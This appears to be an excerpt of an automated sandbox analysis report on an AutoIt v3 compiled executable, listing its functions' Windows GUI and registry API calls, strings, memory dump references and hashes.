                                                                                                                                                                                                                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00459916
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0045993A
                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                • API String ID: 4040870279-2373415609
                                                                                                                                                                                                                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                                                                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                                                                                                                Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                                                                                                                • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                                                                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                                                                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                                                                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                                                                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                                                                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                                                                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 69173610-0
                                                                                                                                                                                                                • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                                                                                                                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                                                                                                                Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                                                                                                                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                                                                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                                                                                                                Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                                                                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                • API String ID: 1038674560-3360698832
                                                                                                                                                                                                                • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                                                                                                                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                                                                                                                                Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Cursor$Load
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1675784387-0
                                                                                                                                                                                                                • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                                                                                • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                                                                                                                Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                                                                                                                • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                                                                                                                • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                                                                                                                • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                                                                                                                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                                                                                                                • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1582027408-0
                                                                                                                                                                                                                • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                                                                                                                                • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                                                                                                                Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseConnectCreateRegistry
                                                                                                                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                • API String ID: 3217815495-966354055
                                                                                                                                                                                                                • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                                                                                                                                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                                                                                                                Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                                                                                                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
